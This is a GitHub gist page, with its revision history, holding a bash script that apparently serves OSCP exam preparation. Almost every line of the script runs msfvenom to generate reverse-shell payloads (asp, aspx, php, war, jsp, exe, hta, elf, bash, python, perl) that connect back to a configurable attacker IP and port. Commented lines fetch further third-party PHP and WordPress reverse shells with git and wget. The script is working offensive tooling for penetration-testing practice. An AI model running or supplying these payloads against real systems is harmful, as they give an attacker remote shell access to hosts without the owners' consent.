Last active
July 27, 2024 10:44
-
-
Save m8sec/eff67a82efebcb22e08de1beb8c5d88d to your computer and use it in GitHub Desktop.
Revisions
-
m8sec revised this gist
Jul 26, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ #!/usr/bin/env bash # Script to quickly and easily create non-meterpreter payloads for the OSCP # @m8sec # Note: It is recommeneded to create a new directory before running this # script. All payloads will be placed in the current directory -
m8sec revised this gist
Jul 1, 2020 . 1 changed file with 3 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,6 +2,9 @@ # Script to quickly and easily create non-meterpreter payloads for the OSCP # m8r0wn # Note: It is recommeneded to create a new directory before running this # script. All payloads will be placed in the current directory IP="127.0.0.1" # <YOUR IP HERE> PORT=443 # You may have to change this if there are outbound restrictions on the target ;) -
m8sec created this gist
Jul 1, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,36 @@ #!/usr/bin/env bash # Script to quickly and easily create non-meterpreter payloads for the OSCP # m8r0wn IP="127.0.0.1" # <YOUR IP HERE> PORT=443 # You may have to change this if there are outbound restrictions on the target ;) # Web msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f asp -o revShell_$PORT.asp msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f aspx -o revShell_$PORT.aspx msfvenom -p php/reverse_php LHOST=$IP LPORT=$PORT -f raw -o revShell_$PORT.php msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=$PORT -f war -o revShell_$PORT.war msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=$PORT -f raw -o revShell_$PORT.jsp # Windows msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o revShell_$PORT.exe msfvenom -p windows/shell_reverse_tcp LHOST=192.168.19.66 LPORT=443 f hta-psh -o revShell_$PORT.hta # Linux msfvenom -p linux/x86/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f elf -o revShell_$PORT.elf msfvenom -p cmd/unix/reverse_bash LHOST=$IP LPORT=$PORT -f raw -o revShell_$PORT.sh msfvenom -p cmd/unix/reverse_python LHOST=$IP LPORT=$PORT -f raw -o revShell_$PORT.py msfvenom -p cmd/unix/reverse_perl LHOST=$IP LPORT=$PORT -f raw -o revShell_$PORT.pl # Additional Payloads (Optional) # ------------------------------------------ # WordPress Plugin Reverse Shell # git clone https://github.com/leonjza/wordpress-shell # PHP Reverse Shell (Linux Host) # wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O php_revShell.php # PHP Reverse Shell (Windows Host) # Windows host but still having issues? Try changing the $tmpdir variable # wget https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php -O win_php_revShell.php